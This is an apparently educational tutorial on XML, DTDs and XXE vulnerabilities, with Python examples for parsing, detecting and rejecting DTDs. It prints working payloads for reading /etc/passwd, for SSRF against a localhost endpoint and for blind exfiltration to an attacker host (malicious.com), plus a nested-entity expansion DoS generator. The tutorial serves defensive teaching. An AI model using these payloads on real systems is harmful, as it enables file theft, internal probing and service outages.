XML is a markup language, like HTML, that is widely used to store and transmit structured data. A document consists of elements (tags), attributes, and character data. For example:

<?xml version="1.0" encoding="UTF-8"?>
<message id="1">
  <to>John</to>
  <from>Mary</from>
  <heading>Reminder</heading>
  <body>Don't forget to call me!</body>
</message>

The first line is the XML declaration; it is metadata for the parser, not part of the structured data. The remaining lines are the static structure of a single message.
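To make the three building blocks concrete, here is a minimal sketch that reads the message above with Python's standard `xml.etree.ElementTree` module. The variable names are illustrative only, and nothing here is specific to any particular application.

```python
import xml.etree.ElementTree as ET

# The sample message from above, as bytes so the UTF-8 declaration applies.
MESSAGE = b"""<?xml version="1.0" encoding="UTF-8"?>
<message id="1">
  <to>John</to>
  <from>Mary</from>
  <heading>Reminder</heading>
  <body>Don't forget to call me!</body>
</message>"""

root = ET.fromstring(MESSAGE)

print(root.tag)               # element name of the root
print(root.get("id"))         # attribute value
for child in root:
    # Each child element carries its character data in .text
    print(child.tag, "->", child.text)
```

At this stage the parser only reads static structure; no part of the document is interpreted beyond its markup.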

The trouble starts when the content of an XML document is interpreted rather than simply read. What makes it dynamic also makes it dangerous!

XSLT (Extensible Stylesheet Language Transformations) is a language used to transform and format XML documents. When the stylesheet or the document it processes is attacker-controlled:

  • An attacker can inject, modify, or extract sensitive data in XML documents.
  • A crafted XML file can declare entities that pull in external resources, leading to an XML External Entity (XXE) vulnerability.

DTDs (Document Type Definitions) define the structure and the legal elements and attributes of an XML document.

  • A DTD declares which elements, attributes, and entities are allowed in the document, so that a parser can validate the data before processing it.
  • This feature can be abused through the SYSTEM keyword, which makes an entity refer to an external resource identified by a file path or URL.
  • In other words, the parser can be made to pull attacker-chosen data into the document. See examples below.

(1) Arbitrary file read:

<!DOCTYPE config [<!ELEMENT config ANY> <!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<config>
&xxe;
</config>

(2) Server-Side Request Forgery (SSRF):

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE config [<!ELEMENT config ANY> <!ENTITY xxe SYSTEM "http://localhost:8080/internal-endpoint">]>
<config>
&xxe;
</config>

(3) Blind XXE:

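Contents of http://malicious.com/attack.dtd, hosted by the attacker (the php://filter wrapper assumes a PHP target):

<!ENTITY % cmd SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % blind "<!ENTITY exfil SYSTEM 'http://malicious.com/?exfil=%cmd;'>">
%blind;

Payload sent to the target, which loads that external DTD:

<!DOCTYPE config SYSTEM "http://malicious.com/attack.dtd">
<config>
&exfil;
</config>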
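All three payloads depend on an entity declared with a SYSTEM identifier. As a rough illustration, the sketch below uses Python's `xml.parsers.expat` to list such declarations in a document without resolving them. The function name `list_external_entities` and the `PAYLOAD` constant are hypothetical, chosen only for this example. It relies on the assumption that no external-entity handler is installed, so the parser never opens the referenced file or URL.

```python
from xml.parsers import expat


def list_external_entities(xml_text: str) -> list[tuple[str, str]]:
    """Return (entity name, SYSTEM identifier) pairs declared in the DTD."""
    found: list[tuple[str, str]] = []

    def on_entity_decl(name, is_parameter, value, base,
                       system_id, public_id, notation):
        # External entities carry a system identifier instead of an inline value.
        if system_id is not None:
            found.append((name, system_id))

    parser = expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    # No ExternalEntityRefHandler is set, so the reference is never fetched.
    parser.Parse(xml_text, True)
    return found


# Same shape as the arbitrary file read example.
PAYLOAD = (
    '<!DOCTYPE config [<!ELEMENT config ANY> '
    '<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    '<config>&xxe;</config>'
)

print(list_external_entities(PAYLOAD))
```

A listing like this is only an inspection aid; it does not make a vulnerable parser safe.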

XXE Vulnerability

  • In-Band
    • The expanded entity is returned in the application's response, so data is exfiltrated directly from the target.
  • Out-of-Band (blind)
    • Nothing is returned in the response, so exfiltration requires an additional channel, such as DNS queries or HTTP requests to a host controlled by the attacker.
  • Denial-of-Service (DoS)
    • Attackers can cause DoS by abusing entity expansion with excessively large or deeply nested entities.
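The DoS case is easiest to see with numbers. The sketch below builds a deliberately small nested-entity document (3 levels, 10 references per level) and parses it with `xml.etree.ElementTree`, then computes the expanded size for the 9-level variant without parsing it. The helper names are hypothetical, and the sizes are kept tiny on purpose; recent Expat releases also enforce amplification limits, so large payloads may be rejected rather than expanded.

```python
import xml.etree.ElementTree as ET


def nested_entity_document(levels: int, fanout: int, seed: str = "lol") -> str:
    """Build a document whose entity e{levels} expands to fanout**levels seeds."""
    decls = [f'<!ENTITY e0 "{seed}">']
    for i in range(1, levels + 1):
        refs = f"&e{i - 1};" * fanout          # each level references the previous one
        decls.append(f'<!ENTITY e{i} "{refs}">')
    dtd = "\n  ".join(decls)
    return f"<!DOCTYPE r [\n  {dtd}\n]>\n<r>&e{levels};</r>"


def expanded_length(levels: int, fanout: int, seed: str = "lol") -> int:
    """Size of the fully expanded text, computed without parsing anything."""
    return len(seed) * fanout ** levels


doc = nested_entity_document(levels=3, fanout=10)
root = ET.fromstring(doc)                      # small enough to expand safely
print(len(doc), "characters in ->", len(root.text), "characters out")

# Nine levels with the same fanout: computed, never parsed.
print(expanded_length(levels=9, fanout=10), "characters for the 9-level variant")
```

The input grows linearly with the number of levels while the output grows exponentially, which is why a payload of a few hundred bytes can exhaust memory.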

Considerations

  • XML parsers should interpret as little of their input as possible, because features such as external entities and DTDs can be misused.
  • Prefer JSON (or CSV) over XML when possible.
  • Vulnerabilities are typically the result of misconfiguration, bad coding practices, and weak restrictions.
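One way to apply the first point is to refuse any document that carries a DOCTYPE before handing it to the real parser. The following is a minimal sketch using only the Python standard library; `parse_untrusted` and `DTDForbidden` are hypothetical names for this example, and the approach assumes the application never needs DTDs from untrusted input. It is not a substitute for a hardened parsing library.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DTDForbidden(ValueError):
    """Raised when untrusted XML contains a DOCTYPE declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    raise DTDForbidden(f"DOCTYPE declaration not allowed: {name!r}")


def parse_untrusted(xml_text: str) -> ET.Element:
    """Parse XML only if it declares no DTD (and therefore no entities)."""
    scanner = expat.ParserCreate()
    scanner.StartDoctypeDeclHandler = _reject_doctype
    scanner.Parse(xml_text, True)      # raises DTDForbidden on any DOCTYPE
    return ET.fromstring(xml_text)     # reached only for DTD-free documents


SAFE = '<message id="1"><to>John</to></message>'
XXE = (
    '<!DOCTYPE config [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    '<config>&xxe;</config>'
)

print(parse_untrusted(SAFE).findtext("to"))
try:
    parse_untrusted(XXE)
except DTDForbidden as err:
    print("rejected:", err)
```

Rejecting the DOCTYPE outright covers external entities and nested-entity expansion in one check, at the cost of refusing documents that use a DTD legitimately.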